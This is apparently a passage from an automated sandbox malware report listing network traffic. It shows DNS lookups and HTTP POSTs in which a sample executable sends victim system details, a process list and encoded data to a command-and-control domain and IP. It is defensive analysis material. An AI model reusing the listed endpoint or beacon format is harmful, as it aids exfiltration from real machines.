                                                    Dec 19, 2024 08:33:36.683278084 CET8049709194.87.47.113192.168.2.10
                                                    Dec 19, 2024 08:33:36.683469057 CET8049709194.87.47.113192.168.2.10
                                                    Dec 19, 2024 08:33:36.683562994 CET8049709194.87.47.113192.168.2.10
                                                    Dec 19, 2024 08:33:36.683660030 CET8049709194.87.47.113192.168.2.10
                                                    Dec 19, 2024 08:33:36.683731079 CET8049709194.87.47.113192.168.2.10
                                                    Dec 19, 2024 08:33:36.683762074 CET8049709194.87.47.113192.168.2.10
                                                    Dec 19, 2024 08:33:36.683854103 CET8049709194.87.47.113192.168.2.10
                                                    Dec 19, 2024 08:33:36.683887005 CET8049709194.87.47.113192.168.2.10
                                                    Dec 19, 2024 08:33:36.684241056 CET8049709194.87.47.113192.168.2.10
                                                    Dec 19, 2024 08:33:36.684271097 CET8049709194.87.47.113192.168.2.10
                                                    Dec 19, 2024 08:33:36.684299946 CET8049709194.87.47.113192.168.2.10
                                                    Dec 19, 2024 08:33:36.684334040 CET8049709194.87.47.113192.168.2.10
                                                    Dec 19, 2024 08:33:36.684402943 CET8049709194.87.47.113192.168.2.10
                                                    Dec 19, 2024 08:33:36.684495926 CET8049709194.87.47.113192.168.2.10
                                                    Dec 19, 2024 08:33:36.684525967 CET8049709194.87.47.113192.168.2.10
                                                    Dec 19, 2024 08:33:36.684539080 CET4970980192.168.2.10194.87.47.113
                                                    Dec 19, 2024 08:33:36.684581995 CET4970980192.168.2.10194.87.47.113
                                                    Dec 19, 2024 08:33:36.684586048 CET8049709194.87.47.113192.168.2.10
                                                    Dec 19, 2024 08:33:36.684638023 CET8049709194.87.47.113192.168.2.10
                                                    Dec 19, 2024 08:33:36.684686899 CET4970980192.168.2.10194.87.47.113
                                                    Dec 19, 2024 08:33:36.684741974 CET8049709194.87.47.113192.168.2.10
                                                    Dec 19, 2024 08:33:36.684771061 CET8049709194.87.47.113192.168.2.10
                                                    Dec 19, 2024 08:33:36.684818983 CET4970980192.168.2.10194.87.47.113
                                                    Dec 19, 2024 08:33:36.684973955 CET8049709194.87.47.113192.168.2.10
                                                    Dec 19, 2024 08:33:36.685022116 CET8049709194.87.47.113192.168.2.10
                                                    Dec 19, 2024 08:33:36.685086966 CET4970980192.168.2.10194.87.47.113
                                                    Dec 19, 2024 08:33:36.685131073 CET8049709194.87.47.113192.168.2.10
                                                    Dec 19, 2024 08:33:36.685159922 CET8049709194.87.47.113192.168.2.10
                                                    Dec 19, 2024 08:33:36.685225964 CET8049709194.87.47.113192.168.2.10
                                                    Dec 19, 2024 08:33:36.685229063 CET4970980192.168.2.10194.87.47.113
                                                    Dec 19, 2024 08:33:36.685255051 CET8049709194.87.47.113192.168.2.10
                                                    Dec 19, 2024 08:33:36.685359955 CET8049709194.87.47.113192.168.2.10
                                                    Dec 19, 2024 08:33:36.685409069 CET8049709194.87.47.113192.168.2.10
                                                    Dec 19, 2024 08:33:36.685472965 CET8049709194.87.47.113192.168.2.10
                                                    Dec 19, 2024 08:33:36.685523987 CET8049709194.87.47.113192.168.2.10
                                                    Dec 19, 2024 08:33:36.685647011 CET8049709194.87.47.113192.168.2.10
                                                    Dec 19, 2024 08:33:36.685674906 CET8049709194.87.47.113192.168.2.10
                                                    Dec 19, 2024 08:33:36.685709000 CET8049709194.87.47.113192.168.2.10
                                                    Dec 19, 2024 08:33:36.685758114 CET8049709194.87.47.113192.168.2.10
                                                    Dec 19, 2024 08:33:36.685826063 CET8049709194.87.47.113192.168.2.10
                                                    Dec 19, 2024 08:33:36.685900927 CET8049709194.87.47.113192.168.2.10
                                                    Dec 19, 2024 08:33:36.685929060 CET8049709194.87.47.113192.168.2.10
                                                    Dec 19, 2024 08:33:36.685977936 CET8049709194.87.47.113192.168.2.10
                                                    Dec 19, 2024 08:33:36.686043024 CET8049709194.87.47.113192.168.2.10
                                                    Dec 19, 2024 08:33:36.686074972 CET8049709194.87.47.113192.168.2.10
                                                    Dec 19, 2024 08:33:36.686197042 CET8049709194.87.47.113192.168.2.10
                                                    Dec 19, 2024 08:33:36.686224937 CET8049709194.87.47.113192.168.2.10
                                                    Dec 19, 2024 08:33:36.686294079 CET8049709194.87.47.113192.168.2.10
                                                    Dec 19, 2024 08:33:36.686342955 CET8049709194.87.47.113192.168.2.10
                                                    Dec 19, 2024 08:33:36.686394930 CET8049709194.87.47.113192.168.2.10
                                                    Dec 19, 2024 08:33:36.686444044 CET8049709194.87.47.113192.168.2.10
                                                    Dec 19, 2024 08:33:36.686554909 CET8049709194.87.47.113192.168.2.10
                                                    Dec 19, 2024 08:33:36.686605930 CET8049709194.87.47.113192.168.2.10
                                                    Dec 19, 2024 08:33:36.686707973 CET8049709194.87.47.113192.168.2.10
                                                    Dec 19, 2024 08:33:36.686736107 CET8049709194.87.47.113192.168.2.10
                                                    Dec 19, 2024 08:33:36.686806917 CET8049709194.87.47.113192.168.2.10
                                                    Dec 19, 2024 08:33:36.686871052 CET8049709194.87.47.113192.168.2.10
                                                    Dec 19, 2024 08:33:36.686983109 CET8049709194.87.47.113192.168.2.10
                                                    Dec 19, 2024 08:33:36.687031984 CET8049709194.87.47.113192.168.2.10
                                                    Dec 19, 2024 08:33:36.687196970 CET8049709194.87.47.113192.168.2.10
                                                    Dec 19, 2024 08:33:36.687246084 CET8049709194.87.47.113192.168.2.10
                                                    Dec 19, 2024 08:33:36.687299013 CET8049709194.87.47.113192.168.2.10
                                                    Dec 19, 2024 08:33:36.726366997 CET8049709194.87.47.113192.168.2.10
                                                    Dec 19, 2024 08:33:36.744590998 CET8049709194.87.47.113192.168.2.10
                                                    Dec 19, 2024 08:33:36.744859934 CET8049709194.87.47.113192.168.2.10
                                                    Dec 19, 2024 08:33:36.745122910 CET4970980192.168.2.10194.87.47.113
                                                    Dec 19, 2024 08:33:36.745580912 CET4970980192.168.2.10194.87.47.113
                                                    Dec 19, 2024 08:33:36.796339035 CET8049709194.87.47.113192.168.2.10
                                                    Dec 19, 2024 08:33:36.796408892 CET8049709194.87.47.113192.168.2.10
                                                    Dec 19, 2024 08:33:36.802299023 CET8049709194.87.47.113192.168.2.10
                                                    Dec 19, 2024 08:33:36.802407026 CET8049709194.87.47.113192.168.2.10
                                                    Dec 19, 2024 08:33:36.802417040 CET8049709194.87.47.113192.168.2.10
                                                    Dec 19, 2024 08:33:36.802428961 CET8049709194.87.47.113192.168.2.10
                                                    Dec 19, 2024 08:33:36.802500010 CET8049709194.87.47.113192.168.2.10
                                                    Dec 19, 2024 08:33:36.804137945 CET8049709194.87.47.113192.168.2.10
                                                    Dec 19, 2024 08:33:36.804218054 CET8049709194.87.47.113192.168.2.10
                                                    Dec 19, 2024 08:33:36.804342985 CET8049709194.87.47.113192.168.2.10
                                                    Dec 19, 2024 08:33:36.804399967 CET8049709194.87.47.113192.168.2.10
                                                    Dec 19, 2024 08:33:36.804425955 CET8049709194.87.47.113192.168.2.10
                                                    Dec 19, 2024 08:33:36.804508924 CET8049709194.87.47.113192.168.2.10
                                                    Dec 19, 2024 08:33:36.804563999 CET8049709194.87.47.113192.168.2.10
                                                    Dec 19, 2024 08:33:36.804573059 CET8049709194.87.47.113192.168.2.10
                                                    Dec 19, 2024 08:33:36.804682016 CET8049709194.87.47.113192.168.2.10
                                                    Dec 19, 2024 08:33:36.804691076 CET8049709194.87.47.113192.168.2.10
                                                    Dec 19, 2024 08:33:36.804702044 CET8049709194.87.47.113192.168.2.10
                                                    Dec 19, 2024 08:33:36.804719925 CET8049709194.87.47.113192.168.2.10
                                                    Dec 19, 2024 08:33:36.804804087 CET8049709194.87.47.113192.168.2.10
                                                    Dec 19, 2024 08:33:36.804812908 CET8049709194.87.47.113192.168.2.10
                                                    Dec 19, 2024 08:33:36.804891109 CET8049709194.87.47.113192.168.2.10
                                                    Dec 19, 2024 08:33:36.804899931 CET8049709194.87.47.113192.168.2.10
                                                    Dec 19, 2024 08:33:36.804970026 CET8049709194.87.47.113192.168.2.10
                                                    Dec 19, 2024 08:33:36.805011034 CET8049709194.87.47.113192.168.2.10
                                                    Dec 19, 2024 08:33:36.805109978 CET8049709194.87.47.113192.168.2.10
                                                    Dec 19, 2024 08:33:36.805233002 CET8049709194.87.47.113192.168.2.10
                                                    Dec 19, 2024 08:33:36.805294991 CET8049709194.87.47.113192.168.2.10
                                                    Dec 19, 2024 08:33:36.805337906 CET8049709194.87.47.113192.168.2.10
                                                    Dec 19, 2024 08:33:36.805464029 CET8049709194.87.47.113192.168.2.10
                                                    Dec 19, 2024 08:33:36.805555105 CET8049709194.87.47.113192.168.2.10
                                                    Dec 19, 2024 08:33:36.805563927 CET8049709194.87.47.113192.168.2.10
                                                    Dec 19, 2024 08:33:36.805581093 CET8049709194.87.47.113192.168.2.10
                                                    Dec 19, 2024 08:33:36.805737972 CET8049709194.87.47.113192.168.2.10
                                                    Dec 19, 2024 08:33:36.805747986 CET8049709194.87.47.113192.168.2.10
                                                    Dec 19, 2024 08:33:36.805790901 CET8049709194.87.47.113192.168.2.10
                                                    Dec 19, 2024 08:33:36.805800915 CET8049709194.87.47.113192.168.2.10
                                                    Dec 19, 2024 08:33:36.805828094 CET8049709194.87.47.113192.168.2.10
                                                    Dec 19, 2024 08:33:36.805970907 CET8049709194.87.47.113192.168.2.10
                                                    Dec 19, 2024 08:33:36.806000948 CET8049709194.87.47.113192.168.2.10
                                                    Dec 19, 2024 08:33:36.806135893 CET8049709194.87.47.113192.168.2.10
                                                    Dec 19, 2024 08:33:36.806174040 CET8049709194.87.47.113192.168.2.10
                                                    Dec 19, 2024 08:33:36.806302071 CET8049709194.87.47.113192.168.2.10
                                                    Dec 19, 2024 08:33:36.806312084 CET8049709194.87.47.113192.168.2.10
                                                    Dec 19, 2024 08:33:36.806369066 CET8049709194.87.47.113192.168.2.10
                                                    Dec 19, 2024 08:33:36.806422949 CET8049709194.87.47.113192.168.2.10
                                                    Dec 19, 2024 08:33:36.806432962 CET8049709194.87.47.113192.168.2.10
                                                    Dec 19, 2024 08:33:36.806514978 CET8049709194.87.47.113192.168.2.10
                                                    Dec 19, 2024 08:33:36.806540966 CET8049709194.87.47.113192.168.2.10
                                                    Dec 19, 2024 08:33:36.806581020 CET8049709194.87.47.113192.168.2.10
                                                    Dec 19, 2024 08:33:36.806652069 CET8049709194.87.47.113192.168.2.10
                                                    Dec 19, 2024 08:33:36.806756020 CET8049709194.87.47.113192.168.2.10
                                                    Dec 19, 2024 08:33:36.806766987 CET8049709194.87.47.113192.168.2.10
                                                    Dec 19, 2024 08:33:36.806777954 CET8049709194.87.47.113192.168.2.10
                                                    Dec 19, 2024 08:33:36.806802034 CET8049709194.87.47.113192.168.2.10
                                                    Dec 19, 2024 08:33:36.806890965 CET8049709194.87.47.113192.168.2.10
                                                    Dec 19, 2024 08:33:36.806900978 CET8049709194.87.47.113192.168.2.10
                                                    Dec 19, 2024 08:33:36.806917906 CET8049709194.87.47.113192.168.2.10
                                                    Dec 19, 2024 08:33:36.806946993 CET8049709194.87.47.113192.168.2.10
                                                    Dec 19, 2024 08:33:36.806984901 CET8049709194.87.47.113192.168.2.10
                                                    Dec 19, 2024 08:33:36.807101965 CET8049709194.87.47.113192.168.2.10
                                                    Dec 19, 2024 08:33:36.864630938 CET8049709194.87.47.113192.168.2.10
                                                    Dec 19, 2024 08:33:36.865008116 CET8049709194.87.47.113192.168.2.10
                                                    Dec 19, 2024 08:33:37.830358028 CET4971580192.168.2.10194.87.47.113
                                                    Dec 19, 2024 08:33:37.949914932 CET8049715194.87.47.113192.168.2.10
                                                    Dec 19, 2024 08:33:37.950109959 CET4971580192.168.2.10194.87.47.113
                                                    Dec 19, 2024 08:33:37.950433969 CET4971580192.168.2.10194.87.47.113
                                                    Dec 19, 2024 08:33:38.069972038 CET8049715194.87.47.113192.168.2.10
                                                    Dec 19, 2024 08:33:39.272774935 CET8049715194.87.47.113192.168.2.10
                                                    Dec 19, 2024 08:33:39.272912979 CET8049715194.87.47.113192.168.2.10
                                                    Dec 19, 2024 08:33:39.273014069 CET4971580192.168.2.10194.87.47.113
                                                    Dec 19, 2024 08:33:39.273250103 CET4971580192.168.2.10194.87.47.113
                                                    Dec 19, 2024 08:33:39.392796993 CET8049715194.87.47.113192.168.2.10

                                                    UDP Packets

                                                    TimestampSource PortDest PortSource IPDest IP
                                                    Dec 19, 2024 08:33:32.004762888 CET4922753192.168.2.101.1.1.1
                                                    Dec 19, 2024 08:33:32.004817963 CET4922753192.168.2.101.1.1.1
                                                    Dec 19, 2024 08:33:32.142879963 CET53492271.1.1.1192.168.2.10
                                                    Dec 19, 2024 08:33:32.143028975 CET53492271.1.1.1192.168.2.10
                                                    Dec 19, 2024 08:33:35.182532072 CET4923053192.168.2.101.1.1.1
                                                    Dec 19, 2024 08:33:35.182605028 CET4923053192.168.2.101.1.1.1
                                                    Dec 19, 2024 08:33:35.319902897 CET53492301.1.1.1192.168.2.10
                                                    Dec 19, 2024 08:33:35.319971085 CET53492301.1.1.1192.168.2.10
                                                    Dec 19, 2024 08:33:37.690032959 CET4923253192.168.2.101.1.1.1
                                                    Dec 19, 2024 08:33:37.690083027 CET4923253192.168.2.101.1.1.1
                                                    Dec 19, 2024 08:33:37.827797890 CET53492321.1.1.1192.168.2.10
                                                    Dec 19, 2024 08:33:37.829670906 CET53492321.1.1.1192.168.2.10

                                                    DNS Queries

                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                    Dec 19, 2024 08:33:32.004762888 CET192.168.2.101.1.1.10x8e93Standard query (0)httpbin.orgA (IP address)IN (0x0001)false
                                                    Dec 19, 2024 08:33:32.004817963 CET192.168.2.101.1.1.10x7118Standard query (0)httpbin.org28IN (0x0001)false
                                                    Dec 19, 2024 08:33:35.182532072 CET192.168.2.101.1.1.10x8327Standard query (0)home.twentytk20pn.topA (IP address)IN (0x0001)false
                                                    Dec 19, 2024 08:33:35.182605028 CET192.168.2.101.1.1.10x5cf6Standard query (0)home.twentytk20pn.top28IN (0x0001)false
                                                    Dec 19, 2024 08:33:37.690032959 CET192.168.2.101.1.1.10xeabcStandard query (0)home.twentytk20pn.topA (IP address)IN (0x0001)false
                                                    Dec 19, 2024 08:33:37.690083027 CET192.168.2.101.1.1.10x4dbaStandard query (0)home.twentytk20pn.top28IN (0x0001)false

                                                    DNS Answers

                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                    Dec 19, 2024 08:33:32.142879963 CET1.1.1.1192.168.2.100x8e93No error (0)httpbin.org98.85.100.80A (IP address)IN (0x0001)false
                                                    Dec 19, 2024 08:33:32.142879963 CET1.1.1.1192.168.2.100x8e93No error (0)httpbin.org34.226.108.155A (IP address)IN (0x0001)false
                                                    Dec 19, 2024 08:33:35.319902897 CET1.1.1.1192.168.2.100x8327No error (0)home.twentytk20pn.top194.87.47.113A (IP address)IN (0x0001)false
                                                    Dec 19, 2024 08:33:37.829670906 CET1.1.1.1192.168.2.100xeabcNo error (0)home.twentytk20pn.top194.87.47.113A (IP address)IN (0x0001)false

                                                    HTTP Request Dependency Graph

                                                    • httpbin.org
                                                    • home.twentytk20pn.top

                                                    HTTP Packets

                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    0192.168.2.1049709194.87.47.113807540C:\Users\user\Desktop\Cc8zEnIDB2.exe
                                                    TimestampBytes transferredDirectionData
                                                    Dec 19, 2024 08:33:35.442362070 CET12360OUTPOST /WEIsmPfDcpBFJozngnYN1734366322 HTTP/1.1
                                                    Host: home.twentytk20pn.top
                                                    Accept: */*
                                                    Content-Type: application/json
                                                    Content-Length: 499218
                                                    Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 31 37 33 34 35 39 33 36 31 33 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 33 38 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 [TRUNCATED]
                                                    Data Ascii: { "ip": "8.46.123.189", "current_time": "1734593613", "Num_processor": 4, "Num_ram": 7, "drivers": [ { "name": "C:\\", "all": 223.0, "free": 168.0 } ], "Num_displays": 1, "resolution_x": 1280, "resolution_y": 1024, "recent_files": 38, "processes": [ { "name": "[System Process]", "pid": 0 }, { "name": "System", "pid": 4 }, { "name": "Registry", "pid": 92 }, { "name": "smss.exe", "pid": 324 }, { "name": "csrss.exe", "pid": 408 }, { "name": "wininit.exe", "pid": 484 }, { "name": "csrss.exe", "pid": 492 }, { "name": "winlogon.exe", "pid": 552 }, { "name": "services.exe", "pid": 620 }, { "name": "lsass.exe", "pid": 628 }, { "name": "svchost.exe", "pid": 752 }, { "name": "fontdrvhost.exe", "pid": 776 }, { "name": "fontdrvhost.exe", "pid": 784 }, { "name": "svchost.exe", "pid": 872 }, { "name": "svchost.exe", "pid": 924 }, { "name": "dwm.exe", "pid": 984 }, { "name": "svchost.exe", "pid": 360 }, { "name": "svchost.exe", "pid": 356 }, { "name": "svchost.exe", "pid": 772 }, { "name": "svchost.exe", "pid": [TRUNCATED]
                                                    Dec 19, 2024 08:33:35.562428951 CET2472OUTData Raw: 49 73 35 7a 53 72 53 61 77 38 5a 56 46 4f 76 54 70 55 35 4a 4e 52 6e 4b 57 68 35 5c 2f 52 54 32 58 48 49 36 66 79 70 6c 66 30 43 66 68 67 55 55 55 55 47 6c 50 72 38 76 31 49 58 6a 35 44 2b 5c 2f 2b 66 31 5c 2f 7a 36 4e 71 78 58 37 42 5c 2f 77 44
                                                    Data Ascii: Is5zSrSaw8ZVFOvTpU5JNRnKWh5\/RT2XHI6fyplf0CfhgUUUUGlPr8v1IXj5D+\/+f1\/z6NqxX7B\/wDBMb9iX4Ifta+D\/itqfxYi8WC+8E+I\/DdhpE\/hfxCujGS01vTdSuLiK+jnsNShm8mbTEa2eKK3kX7RcLO86+QsH5\/4meJGR+FXC1bi7iHCZtjMto43B4GVDJqGDxGOdbGzlTpSjTx2Oy6g6cXFuo3iVJK3LCb0
                                                    Dec 19, 2024 08:33:35.562465906 CET4944OUTData Raw: 48 79 5c 2f 77 43 5c 2f 5c 2f 77 42 2b 2b 50 38 41 4a 5c 2f 7a 6a 32 73 5c 2f 36 76 2b 44 35 5c 2f 77 43 66 70 5c 2f 6e 5c 2f 41 42 70 6e 33 73 37 50 77 39 76 72 5c 2f 6e 38 36 44 74 4b 33 2b 5c 2f 6a 72 7a 5c 2f 6b 39 36 68 54 70 5c 2f 77 42 73
                                                    Data Ascii: Hy\/wC\/\/wB++P8AJ\/zj2s\/6v+D5\/wCfp\/n\/ABpn3s7Pw9vr\/n86DtK3+\/jrz\/k96hTp\/wBsh\/NqtP1\/D+pqNv8AV7Nn4c\/54\/X+QdBDk+\/\/AH5\/+vUMn+3+8HOBVnb\/AB\/j0\/HGaZ5fT59n+T2GKCv+XP8A26VJG8zf84f97\/yyBqPc7Lsz\/n6\/5\/On\/wB\/5Pkz18317\/z\/AJ0z+4+zP73
                                                    Dec 19, 2024 08:33:35.562508106 CET2472OUTData Raw: 74 2b 4e 53 55 6a 41 74 2b 65 61 5c 2f 33 71 50 2b 61 63 67 6f 71 58 59 50 66 5c 2f 41 44 2b 46 47 77 65 5c 2f 2b 66 77 6f 41 69 72 2b 6a 6e 5c 2f 67 68 63 78 48 67 58 39 6f 6b 44 74 34 73 2b 48 70 5c 2f 50 52 5c 2f 46 50 38 41 38 54 58 38 35 65
                                                    Data Ascii: t+NSUjAt+ea\/3qP+acgoqXYPf\/AD+FGwe\/+fwoAir+jn\/ghcxHgX9okDt4s+Hp\/PR\/FP8A8TX85ewe\/wDn8K\/eL\/gkt8Q1+Ev7NX7cXxSktPt8fwz8P2XxBexJcLeJ4O8AfEHxE1o3llX23I0wwnY6thztZTg1\/Ln0v8LXx\/g9VwOFh7XE4zirhnC4enovaV8RjZ0qULyaS56k4xu2kr6n9n\/QQxlHBePeHxuKm
                                                    Dec 19, 2024 08:33:35.562640905 CET2472OUTData Raw: 5c 2f 61 49 67 2b 49 58 78 42 38 62 32 50 78 46 31 48 34 58 36 35 34 52 73 50 69 4e 34 5a 2b 45 32 6c 61 78 6f 48 68 37 34 6c 65 44 4e 53 38 61 51 69 34 6e 38 42 65 44 74 4b 75 37 50 57 56 74 4c 4f 77 73 74 54 73 62 58 78 46 71 57 69 6d 52 72 70
                                                    Data Ascii: \/aIg+IXxB8b2PxF1H4X654RsPiN4Z+E2laxoHh74leDNS8aQi4n8BeDtKu7PWVtLOwstTsbXxFqWimRrpR9vMNnex\/z7V\/Q3+2gcf8Ee\/wBjEf3vC37KQ\/8AMB6u39K\/no8v3\/T\/AOvX+h\/0O8LSy\/gLjnLcO6jwuW+LPFGAwkak5VJU8Nhsp4ahThzPyvOVklKpOdRrmm2\/8rfp34qpmHib4f5nXjTWKzPwZ4Sz
                                                    Dec 19, 2024 08:33:35.562747002 CET2472OUTData Raw: 31 39 4b 71 37 6b 32 5c 2f 77 62 49 5c 2f 33 76 6c 5c 2f 35 5c 2f 2b 74 39 50 58 6c 39 6e 35 5c 2f 68 5c 2f 77 54 6f 46 65 54 62 4a 4d 6a 5c 2f 49 5c 2f 6c 44 7a 66 4d 5c 2f 7a 5c 2f 77 44 72 34 2b 6c 51 78 37 31 74 39 6a 5c 2f 38 73 7a 63 65 62
                                                    Data Ascii: 19Kq7k2\/wbI\/3vl\/5\/+t9PXl9n5\/h\/wToFeTbJMj\/I\/lDzfM\/z\/wDr4+lQx71t9j\/8szcebwc\/Xv8A5\/Krm7Kun+p\/5a\/u8\/8A6v8APHpVOT93I6OLiB\/9Iil8vn0\/+tWhpT6\/L9Q8t2kf5d\/l5lz6\/riq3zyfu3Ty3\/5ZeX\/L9OuKuN\/q9+zdD5v7o+V7j\/Pf\/CHy\/M2Tfc8z\/Vx\/6j\/
                                                    Dec 19, 2024 08:33:35.562792063 CET2472OUTData Raw: 4a 64 48 30 70 50 44 65 74 78 78 61 66 61 57 36 74 5a 58 73 70 2b 7a 51 52 32 78 4d 73 69 4d 30 6b 68 4d 43 78 6c 6e 6b 59 6c 6e 5a 73 6c 32 4a 4c 5a 4a 72 38 5c 2f 4a 39 42 54 42 61 33 6e 4b 59 79 64 73 77 79 76 5c 2f 66 78 51 43 6f 48 75 6a 48
                                                    Data Ascii: JdH0pPDetxxafaW6tZXsp+zQR2xMsiM0khMCxlnkYlnZsl2JLZJr8\/J9BTBa3nKYydswyv\/fxQCoHujHHU+v8AJ2e+J2QcV53jM0oZOuF6GJnT9nl9J\/WcNR5KFGjKbxFKEJTrYidOWJxVWWGoxnXrVKjV5SZ\/buS+EXFHCWQYDK6+c0+LMThKU41cx5PqOIr81apVjGOErVKkKVDDwnHD4ajDF1nChRpwjZKMV8o\/tDX\
                                                    Dec 19, 2024 08:33:35.562825918 CET2472OUTData Raw: 35 30 6e 77 58 72 58 67 71 57 33 66 77 50 34 4f 75 64 51 6a 7a 48 5c 2f 62 39 31 71 69 76 59 61 74 70 4d 4c 79 79 77 53 61 5c 2f 59 4a 4f 71 79 36 52 72 71 61 5a 2b 54 76 5c 2f 42 56 67 35 5c 2f 62 6b 2b 4c 51 5c 2f 75 36 56 38 4d 42 5c 2f 35 69
                                                    Data Ascii: 50nwXrXgqW3fwP4OudQjzH\/b91qivYatpMLyywSa\/YJOqy6RrqaZ+Tv\/BVg5\/bk+LQ\/u6V8MB\/5i3wcf61\/S7+zZ+y38G\/2UPAreA\/g\/4dl062v7lNS8TeJNYuv7W8Y+NNaWMxnWvFevPFDJqF4Q8pgtbeCy0fTvtFymk6Zp8VxLG\/8z3\/AAVVOf25\/jAP7unfC8f+Yo8En+tfoP0bOIMpzPxs4SyLhuni48N8
                                                    Dec 19, 2024 08:33:35.562975883 CET4944OUTData Raw: 62 76 51 62 2b 30 38 76 78 5c 2f 34 42 51 2b 66 5c 2f 41 4a 61 64 4f 5c 2f 38 41 54 33 39 4b 59 47 2b 56 38 66 38 41 58 58 5c 2f 50 66 70 6b 31 5a 6b 6a 2b 35 5c 2f 6e 72 5c 2f 55 6e 33 36 56 57 53 50 45 65 39 5c 2f 6e 35 5c 2f 7a 5c 2f 38 41 57
                                                    Data Ascii: bvQb+08vx\/4BQ+f\/AJadO\/8AT39KYG+V8f8AXX\/Pfpk1Zkj+5\/nr\/Un36VWSPEe9\/n5\/z\/8AWoOin1+X6kPmdf4\/0z7UxVjZkkf\/AD\/o3\/1qm2\/wPj+fH\/1s\/l+NQ\/7f\/LP\/AOv+fTj68daDsIfvL8\/p0j5\/z7fjxULf3Nv0z\/P\/ACfr3q5Inyp8n\/fvP9PT6\/8A14Ywnzv\/AB\/8tf8AP+f1
                                                    Dec 19, 2024 08:33:35.682358027 CET2472OUTData Raw: 42 74 53 75 4a 52 70 47 71 44 43 78 76 65 32 4c 67 53 4e 6f 32 75 4a 43 71 70 42 71 74 72 47 33 6d 65 58 42 46 71 4e 74 71 46 70 43 6c 73 50 63 74 49 5c 2f 77 43 43 6b 33 37 51 4f 68 2b 4c 66 45 55 39 7a 66 61 4a 38 53 5c 2f 68 76 65 2b 4d 4e 63
                                                    Data Ascii: BtSuJRpGqDCxve2LgSNo2uJCqpBqtrG3meXBFqNtqFpClsPctI\/wCCk37QOh+LfEU9zfaJ8S\/hve+MNc17w34A+LWhWfiVPDek32q3txpFjpWvW8lr4j0i70fTLiGxsHsNaNlpzW8f2S1MMaxt+dGsan4U0Lwt4K1Vviv8I9c8ceOvhp8H\/ivovwV8NS\/GrUPianhX45eGfD3i7wGbq81D4F6R8Jm1O40HxRpN1f6dYfFO\
                                                    Dec 19, 2024 08:33:35.682389975 CET2472OUTData Raw: 74 46 65 4e 74 5a 6b 38 4f 57 57 6b 66 73 74 5c 2f 45 5c 2f 53 76 68 48 38 56 34 5a 50 45 5a 58 55 49 66 46 6d 70 65 49 39 55 38 4a 54 74 34 62 74 33 30 70 59 4e 64 30 6e 51 76 45 4e 6c 70 65 6e 2b 49 4c 77 33 4e 6c 4e 70 78 38 58 2b 44 70 52 61
                                                    Data Ascii: tFeNtZk8OWWkfst\/E\/SvhH8V4ZPEZXUIfFmpeI9U8JTt4bt30pYNd0nQvENlpen+ILw3NlNpx8X+DpRaTx62Db9FdaFrEHjCx8D2WoeC9e8QH4u+Gvgj4psdC8Q6zPN8MPHXij4b6X8VLKL4ntqXhLSrXwxo1l4Xfxp\/bOtW93q9lpGofCT4qQ3zxW3heK81L8fj4a\/QxklJRyDkvh06j4042VGH1rBZTmGFlVqvP1SpQxG
                                                    Dec 19, 2024 08:33:36.744590998 CET212INHTTP/1.0 503 Service Unavailable
                                                    Cache-Control: no-cache
                                                    Connection: close
                                                    Content-Type: text/html
                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 68 31 3e 0a 4e 6f 20 73 65 72 76 65 72 20 69 73 20 61 76 61 69 6c 61 62 6c 65 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 69 73 20 72 65 71 75 65 73 74 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                    Data Ascii: <html><body><h1>503 Service Unavailable</h1>No server is available to handle this request.</body></html>


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    1192.168.2.1049715194.87.47.113807540C:\Users\user\Desktop\Cc8zEnIDB2.exe
                                                    TimestampBytes transferredDirectionData
                                                    Dec 19, 2024 08:33:37.950433969 CET287OUTPOST /WEIsmPfDcpBFJozngnYN1734366322 HTTP/1.1
                                                    Host: home.twentytk20pn.top
                                                    Accept: */*
                                                    Content-Type: application/json
                                                    Content-Length: 143
                                                    Data Raw: 7b 20 22 69 64 31 22 3a 20 22 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 5c 2f 68 31 3e 5c 6e 4e 6f 20 73 65 72 76 65 72 20 69 73 20 61 76 61 69 6c 61 62 6c 65 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 69 73 20 72 65 71 75 65 73 74 2e 5c 6e 3c 5c 2f 62 6f 64 79 3e 3c 5c 2f 68 74 6d 6c 3e 5c 6e 22 2c 20 22 64 61 74 61 22 3a 20 22 44 6f 6e 65 31 22 20 7d
